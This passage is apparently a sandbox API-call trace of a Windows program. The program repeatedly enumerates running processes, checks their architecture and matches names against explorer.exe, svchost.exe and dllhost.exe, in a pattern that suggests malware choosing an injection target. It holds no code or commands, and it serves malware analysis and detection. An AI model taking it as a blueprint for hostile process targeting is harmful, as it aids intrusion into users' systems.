dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0207.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0207.558] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.558] CloseHandle (hObject=0xd8) returned 1 [0207.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0207.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0207.558] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.558] CloseHandle (hObject=0xd8) returned 1 [0207.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0207.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0207.559] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.559] CloseHandle (hObject=0xd8) returned 1 [0207.559] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0207.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0207.559] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.559] CloseHandle (hObject=0xd8) returned 1 [0207.559] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0207.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0207.560] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.560] CloseHandle (hObject=0xd8) returned 1 [0207.560] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0207.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0207.561] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.561] CloseHandle (hObject=0xd8) returned 1 [0207.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0207.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0207.561] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.561] CloseHandle (hObject=0xd8) returned 1 [0207.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0207.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0207.562] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.562] CloseHandle (hObject=0xd8) returned 1 [0207.562] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0207.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0207.562] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.562] CloseHandle (hObject=0xd8) returned 1 [0207.562] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0207.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0207.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0207.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0207.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0207.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0207.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0207.565] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0207.565] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0207.566] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.566] CloseHandle (hObject=0xd8) returned 1 [0207.566] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0207.566] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0207.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0207.567] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.567] CloseHandle (hObject=0xd8) returned 1 [0207.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0207.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0207.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0207.567] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0207.567] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0207.568] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.568] CloseHandle (hObject=0xd8) returned 1 [0207.568] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0207.568] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.568] CloseHandle (hObject=0xd8) returned 1 [0207.568] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0207.568] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0207.569] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.569] CloseHandle (hObject=0xd8) returned 1 [0207.569] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.569] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0207.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0207.570] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.570] CloseHandle (hObject=0xd8) returned 1 [0207.570] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0207.571] CloseHandle (hObject=0xd4) returned 1 [0207.571] Sleep (dwMilliseconds=0x3e8) [0208.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0208.608] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0208.608] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0208.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0208.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0208.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0208.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0208.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0208.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0208.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0208.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0208.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0208.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0208.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0208.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0208.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0208.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0208.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0208.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0208.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0208.617] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.617] CloseHandle (hObject=0xd8) returned 1 [0208.617] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0208.617] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0208.617] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0208.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0208.618] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0208.618] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.618] CloseHandle (hObject=0xd8) returned 1 [0208.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0208.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0208.619] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0208.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0208.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0208.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0208.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0208.620] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.620] CloseHandle (hObject=0xd8) returned 1 [0208.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0208.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0208.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.621] CloseHandle (hObject=0xd8) returned 1 [0208.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0208.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0208.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.621] CloseHandle (hObject=0xd8) returned 1 [0208.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0208.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0208.622] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.622] CloseHandle (hObject=0xd8) returned 1 [0208.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0208.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0208.622] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.622] CloseHandle (hObject=0xd8) returned 1 [0208.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0208.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0208.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.623] CloseHandle (hObject=0xd8) returned 1 [0208.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0208.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 